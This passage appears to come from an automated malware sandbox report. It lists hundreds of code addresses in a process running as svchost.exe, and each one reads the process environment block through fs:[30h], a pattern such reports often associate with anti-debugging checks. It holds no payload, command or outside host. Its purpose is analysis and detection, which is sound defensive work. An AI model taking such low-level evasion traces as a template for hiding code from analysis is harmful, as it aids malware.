                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]3_2_0306674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]3_2_0306674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030750 mov eax, dword ptr fs:[00000030h]3_2_03030750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE75D mov eax, dword ptr fs:[00000030h]3_2_030BE75D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]3_2_03072750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]3_2_03072750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B4755 mov eax, dword ptr fs:[00000030h]3_2_030B4755
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038770 mov eax, dword ptr fs:[00000030h]3_2_03038770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]3_2_03040770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D678E mov eax, dword ptr fs:[00000030h]3_2_030D678E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030307AF mov eax, dword ptr fs:[00000030h]3_2_030307AF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E47A0 mov eax, dword ptr fs:[00000030h]3_2_030E47A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303C7C0 mov eax, dword ptr fs:[00000030h]3_2_0303C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B07C3 mov eax, dword ptr fs:[00000030h]3_2_030B07C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]3_2_030527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE7E1 mov eax, dword ptr fs:[00000030h]3_2_030BE7E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]3_2_030347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]3_2_030347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE609 mov eax, dword ptr fs:[00000030h]3_2_030AE609
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]3_2_0304260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03072619 mov eax, dword ptr fs:[00000030h]3_2_03072619
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E627 mov eax, dword ptr fs:[00000030h]3_2_0304E627
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03066620 mov eax, dword ptr fs:[00000030h]3_2_03066620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068620 mov eax, dword ptr fs:[00000030h]3_2_03068620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303262C mov eax, dword ptr fs:[00000030h]3_2_0303262C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304C640 mov eax, dword ptr fs:[00000030h]3_2_0304C640
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]3_2_030F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]3_2_030F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]3_2_0306A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]3_2_0306A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062674 mov eax, dword ptr fs:[00000030h]3_2_03062674
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]3_2_03034690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]3_2_03034690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C6A6 mov eax, dword ptr fs:[00000030h]3_2_0306C6A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030666B0 mov eax, dword ptr fs:[00000030h]3_2_030666B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0306A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A6C7 mov eax, dword ptr fs:[00000030h]3_2_0306A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]3_2_030AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]3_2_030B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]3_2_030B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6500 mov eax, dword ptr fs:[00000030h]3_2_030C6500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]3_2_03104500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]3_2_03040535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]3_2_0305E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]3_2_03038550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]3_2_03038550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]3_2_0306656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032582 mov eax, dword ptr fs:[00000030h]3_2_03032582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03032582 mov ecx, dword ptr fs:[00000030h]3_2_03032582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064588 mov eax, dword ptr fs:[00000030h]3_2_03064588
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E59C mov eax, dword ptr fs:[00000030h]3_2_0306E59C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]3_2_030B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]3_2_030545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]3_2_030545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]3_2_0306E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]3_2_0306E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030365D0 mov eax, dword ptr fs:[00000030h]3_2_030365D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]3_2_0306A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]3_2_0306A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]3_2_0305E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030325E0 mov eax, dword ptr fs:[00000030h]3_2_030325E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]3_2_0306C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]3_2_0306C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]3_2_03068402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]3_2_0302E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C427 mov eax, dword ptr fs:[00000030h]3_2_0302C427
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]3_2_030B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A430 mov eax, dword ptr fs:[00000030h]3_2_0306A430
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]3_2_0306E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA456 mov eax, dword ptr fs:[00000030h]3_2_030EA456
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302645D mov eax, dword ptr fs:[00000030h]3_2_0302645D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305245A mov eax, dword ptr fs:[00000030h]3_2_0305245A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC460 mov ecx, dword ptr fs:[00000030h]3_2_030BC460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]3_2_0305A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA49A mov eax, dword ptr fs:[00000030h]3_2_030EA49A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030364AB mov eax, dword ptr fs:[00000030h]3_2_030364AB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030644B0 mov ecx, dword ptr fs:[00000030h]3_2_030644B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BA4B0 mov eax, dword ptr fs:[00000030h]3_2_030BA4B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030304E5 mov ecx, dword ptr fs:[00000030h]3_2_030304E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104B00 mov eax, dword ptr fs:[00000030h]3_2_03104B00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]3_2_030AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]3_2_0305EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]3_2_0305EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]3_2_030F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]3_2_030F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]3_2_030E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]3_2_030E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]3_2_03102B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]3_2_030C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]3_2_030C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FAB40 mov eax, dword ptr fs:[00000030h]3_2_030FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D8B42 mov eax, dword ptr fs:[00000030h]3_2_030D8B42
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028B50 mov eax, dword ptr fs:[00000030h]3_2_03028B50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEB50 mov eax, dword ptr fs:[00000030h]3_2_030DEB50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302CB7E mov eax, dword ptr fs:[00000030h]3_2_0302CB7E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]3_2_03040BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]3_2_03040BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]3_2_030E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]3_2_030E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]3_2_03050BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]3_2_03030BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEBD0 mov eax, dword ptr fs:[00000030h]3_2_030DEBD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]3_2_03038BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EBFC mov eax, dword ptr fs:[00000030h]3_2_0305EBFC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BCBF0 mov eax, dword ptr fs:[00000030h]3_2_030BCBF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BCA11 mov eax, dword ptr fs:[00000030h]3_2_030BCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA24 mov eax, dword ptr fs:[00000030h]3_2_0306CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305EA2E mov eax, dword ptr fs:[00000030h]3_2_0305EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]3_2_03054A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]3_2_03054A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA38 mov eax, dword ptr fs:[00000030h]3_2_0306CA38
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]3_2_03036A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]3_2_03040A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]3_2_03040A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]3_2_0306CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DEA60 mov eax, dword ptr fs:[00000030h]3_2_030DEA60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]3_2_030ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]3_2_030ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]3_2_0303EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104A80 mov eax, dword ptr fs:[00000030h]3_2_03104A80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068A90 mov edx, dword ptr fs:[00000030h]3_2_03068A90
